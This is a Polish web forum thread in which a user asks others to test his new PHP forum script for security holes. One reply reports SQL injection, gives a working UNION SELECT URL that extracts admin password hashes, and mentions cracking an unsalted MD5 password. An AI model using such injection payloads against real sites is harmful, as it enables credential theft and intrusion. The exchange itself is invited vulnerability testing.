 [skrypt] Skrypt forum |
| [skrypt] Skrypt forum |
Post
#1
|
|
|
Grupa: Zarejestrowani Postów: 190 Pomógł: 2 Dołączył: 30.11.2009 Ostrzeżenie: (10%) 
 |
Gdzieś 7 czerwca rozpocząłem pracę nad własnym skryptem forum.
Skrypt ma budowę strukturalną w 95%, te 5% jest to klasa MySQL oraz klasa szablonów. Cudów tam nie ma ale jak na 2tyg. pracy chyba nie jest źle. Proszę szukać błędów, sql inj, xss etc. Kod http://zenb.hostil.pl/index.php Hosting na razie jest jaki jest (troche wolny, niestabilny) ale jak skrypt będę rozwijać (mam taki zamiar) to się coś wybierze. Pozdro |
 |
 
|
 |
|
Post
#2
|
|
|
Grupa: Zarejestrowani Postów: 697 Pomógł: 47 Dołączył: 19.12.2003 Skąd: Lublin Ostrzeżenie: (0%) 
|
Strona dziurawa (IMG:style_emoticons/default/winksmiley.jpg) . Dokładniej podatna na SQL Injection oraz Blind SQL Injection. Złamanie jej zajęło mi 5 minut (IMG:style_emoticons/default/biggrin.gif) . Hasło typu xxx111 nie jest zbyt najtrudniejsze do złamania ;]. Pierwszy z brzegu słownik MD5 mi rozgryzł hash(czemu nie dodajesz soli?).
A tu działający kod (IMG:style_emoticons/default/smile.gif) Kod http://zenb.hostil.pl/user.php?module=view&user=32%20AND%201=0%20UNION%20SELECT%201,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20users%20-- W polu Strona WWW widać jak na dłoni hasło administratora (IMG:style_emoticons/default/winksmiley.jpg) . Pozdrawiam (IMG:style_emoticons/default/biggrin.gif) |
|
|
|
deniol13 [skrypt] Skrypt forum 21.06.2010, 15:50:03 
pedro84 Mam tylko jeden, więcej mi sie szukac nie chce. Pr... 21.06.2010, 15:55:07 deniol13 chodzi ci o to zeby login zostal, email i te inne ... 21.06.2010, 15:58:45 deniol13 nom brawo
dziwne, dałem mysql_real_escape_string ... 30.06.2010, 10:57:54 Kowol http://zenb.xaa.pl/pw.php?mode=new&use...);%3C... 30.06.2010, 20:34:30 
deniol13 poprawione, prosze o wiecej bo chce kiedys wypusci... 1.07.2010, 23:31:25  |
|
Aktualny czas: 4.10.2025 - 01:17 |
